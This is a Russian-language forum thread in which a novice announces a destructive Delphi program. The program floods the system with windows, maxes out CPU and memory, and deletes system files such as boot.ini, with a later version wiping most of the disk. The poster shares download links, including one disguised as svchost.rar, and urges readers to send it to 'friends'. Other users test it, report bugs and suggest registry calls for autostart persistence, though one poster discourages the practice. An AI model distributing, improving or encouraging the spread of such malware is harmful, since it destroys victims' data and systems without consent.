Наконец то я написал свой первый вирус! Вир написан в среде Делфи 7. Он открывает кучу приложений около 2000)))) Чем очень блокирует работу компа! Процессор грузится на 100%! Забивается RAM! В общем, все ресурсы используются по максимуму! К тому же он удаляет системные файлы, в том числе и виртуальную память(наверное)! Так как я еще не разобрался с автозагрузкой, система больше не загрузится! Как я говорил. Вирус удаляет много системных файлов, среди них boot.ini! Ешо поверх всех этих операций высвечивается окошечко с названием вира, его автором, версией, а так же полоской состояния! В общем, все красиво! Желаю приятного использования! Отсылайте этот вирус своим «Друзьям», знакомым! Когда вир запалят дайте плиз линк, где можно прочитать про него! Интересно… Если вирус не работает, или у вас есть дополнение, пишите сюда! Спасибо за внимание! Я очень старался! ссылка на закачку: http://kompna100.by.ru/svchost.rar ps если не в тему извеняйте. это же на делфи писанно...
во-первых: нет никакого окошечка с названием вира, его автором, версией, а так же полоской состояния; во-вторых: винда по прежнему грузится, но когда нужно выбрать операционку она говорит "неправельный boot.ini" ну а ваще молодец, хоть как-то он работает
Вирус - программа, основной функцией которой является самораспространение, возможны также и деструктивные функции. То есть вирус заражает другие программы, копируя в них свой код и перехватывая управление программой при ее запуске для дальнейшего распространения. Хинт: все последние эпидемии идут от червей, а не от вирусов, вирусы в чистом понимании этого слова отошли в прошлое. Логическая бомба - деструктивная программа, срабатывающая при определенных условиях. ----- Разберись с терминологией
я на делфи написал глав окошко, выводить поверх всех окон, но наверное из за большого колличества окон его захлестнуло, попробую исправить.... 2[hidden] значит у меня не вирус а логическая бомба?
PHP: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional RU" /fastdetect /kernel=kernel1.exe вот рабочий =). юлин я стока виров раньше писал хех всё под снос ушло хз. винда ушла, когда тестил один из них. .
а я вот вторую версию пишу! ща тестил, винда напрочь слетела! хорошо я заранее слепок сделал!)))) я всетаки его вирусом звать буду.... не карасивоИМХО как то логическая бомба...
Да уж... помницо ещё в школе в классе 10ом наверное, создал свой первый деструктивный код, он тоже забивал всю память, сворачивал каждую секунду все окна и прописывался в авторан, так гордился этим, кодил я наверное тогда от силы неделю, буквально пару первых глав в учебнике прочёл... Спустя время начинаешь понимать, что подобные программы ровным счётом ничего не стоят, их может написать любой человек, который прочёл первые 50-70 страниц учебника по программированию. Автор, на будущее, не старайся разрушать, для этого ни много ума ни много знаний не надо и ни у кого ты этим уважения не вызовешь, создавай что-нибудь полезное для себя или для других. Со временем, если продвинешься в теме кодинга или вообще в теме, то поймёшь как было глупо создавать подобные "вирусы". Это конечно личное дело каждого, все мы этот этап проходили, но лучше перескочи через него, никакой пользы от этого нет
ты меня маленько отговорил... но всетаки я выпустиол посленюю версию этого вира, финальная.... работает все! только тер все практически с диска с уаляется.... ущерб ощенимый! пользуйтесь!!! ссылка на закачку: http://kompna100.by.ru/apalone.rar я сторался, всем спасибо!
вот щас все нормально. но: 1. загружаются только окна, раньше были и проги. 2. окошко с названием не появляется. 3. в начале секунд 5 ничего не происходет, я уж подумал что не работыер, но потом все хорошо.
Гы... насчёт автозагрузки, есть две замечательные функции winapi: RegOpenKey, RegSetValueEx. Почитай про них.
парни возьмите в руки учебники по асму и доки по ядерному кодингу, вот тогда будет на что посмотреть, а то посмотрите как я написал MessageBox(0, "Hello world!:\",0,0) скорее оффтоп чем тема для разговора.